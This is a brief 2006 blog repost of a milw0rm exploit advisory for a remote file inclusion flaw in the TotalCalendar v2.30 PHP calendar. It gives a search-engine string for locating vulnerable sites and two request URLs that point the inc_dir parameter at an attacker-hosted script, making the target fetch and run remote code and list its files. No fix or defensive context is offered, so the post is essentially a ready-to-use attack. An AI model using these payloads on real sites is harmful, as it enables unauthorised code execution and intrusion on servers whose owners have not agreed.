Saturday, May 06, 2006 |
TotalCalendar v2.30 Bug |
Vendor: SweetPHP URL: http://sweetphp.com -----------------------------------------------------------------
Credits: Discovered by: 'Aesthetico' http://www.majorsecurity.de ----------------------------------------------------------------- Search for: "Powered by TotalCalendar" -----------------------------------------------------------------
Exploitation:
/index.php?inc_dir=http://www.yourspace.com/yourscript.php? /index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF
# milw0rm.com [2006-05-05] |
posted by banjar-hack @ 1:59 PM   |
|
|
|
|